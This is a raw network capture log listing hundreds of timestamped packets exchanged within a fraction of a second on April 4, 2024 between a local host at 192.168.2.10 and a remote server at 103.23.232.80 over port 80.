Apr 4, 2024 17:49:07.579080105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579087019 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579104900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579119921 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579150915 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579175949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579189062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579200983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579240084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579253912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579266071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579279900 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579298019 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579324007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579335928 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579348087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579355955 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579370022 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579380989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579387903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579426050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579438925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579447031 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579451084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579466105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579483032 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579504967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579576015 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579602957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579617023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579628944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579648972 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579663992 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579684973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579718113 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579741955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579755068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579787970 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579814911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579827070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579838991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579862118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579862118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579875946 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579876900 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579902887 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579930067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579942942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579965115 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579984903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.579993010 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.579999924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580024004 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580028057 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580046892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580051899 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580060005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580075979 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580091953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580095053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580127954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580164909 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580190897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580208063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580248117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580285072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580317020 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580317020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580351114 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580459118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580513000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580524921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580547094 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580564022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580578089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580580950 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580590010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580605030 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580629110 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580636024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580693007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580702066 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580707073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580729961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580741882 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580741882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580779076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580784082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580787897 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580797911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580832005 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580856085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580879927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580909014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580913067 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580940008 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.580967903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.580980062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581023932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581027031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581041098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581048012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581059933 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581109047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581120968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581132889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581149101 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581168890 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581175089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581208944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581223011 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581248999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581296921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581310034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581331015 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581334114 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581350088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581360102 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581414938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581440926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581442118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581482887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581496000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581507921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581531048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581547022 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581571102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581576109 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581587076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581620932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581621885 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581650972 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581654072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581717968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581759930 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581775904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581789017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581801891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581809998 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581835985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581837893 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581860065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581866980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581891060 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581892014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581943035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581963062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.581981897 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.581999063 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582031012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582043886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582056999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582068920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582073927 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582103014 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582124949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582138062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582160950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582176924 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582180023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582199097 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582235098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582257986 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582274914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582278967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582293987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582325935 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582361937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582380056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582391977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582397938 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582405090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582412004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582448006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582463980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582487106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582509995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582523108 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582540989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582560062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582564116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582577944 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582600117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582617998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582631111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582644939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582663059 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582681894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582695007 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582714081 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582715034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582750082 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582771063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582783937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582796097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582818985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582822084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582842112 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582868099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582885027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582891941 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582899094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582921028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582935095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582952023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582959890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.582978010 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582992077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.582994938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583019972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583028078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583053112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583070993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583084106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583096027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583117962 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583142996 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583152056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583164930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583184004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583220959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583223104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583235025 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583247900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583254099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583261013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583273888 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583306074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583306074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583338976 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583365917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583380938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583393097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583408117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583414078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583434105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583451986 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583476067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583497047 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583518982 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583522081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583539963 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583563089 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583564997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583574057 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583580017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583595991 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583611965 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583623886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583647013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583658934 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583681107 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583717108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583760977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583795071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583805084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583817959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583849907 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583868980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583882093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583904028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583925009 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583931923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583945036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583957911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583964109 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583978891 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.583981991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.583995104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584016085 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584016085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584052086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584085941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584089994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584100008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584135056 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584151030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584176064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584213972 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584239006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584250927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584263086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584275961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584279060 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584300995 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584320068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584323883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584332943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584359884 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584388018 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584449053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584464073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584475994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584485054 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584487915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584500074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584513903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584523916 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584547997 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584590912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584604979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584618092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584631920 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584656954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584661007 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584691048 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584713936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584727049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584767103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584772110 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584793091 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584791899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584811926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584817886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584839106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584841013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584855080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584867001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584887028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584902048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584903002 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584914923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584925890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.584938049 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584954023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.584980965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.585000992 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.585011959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.585019112 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.585057020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.585066080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.585091114 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.585104942 CEST	80	49730	103.23.232.80	192.168.2.10
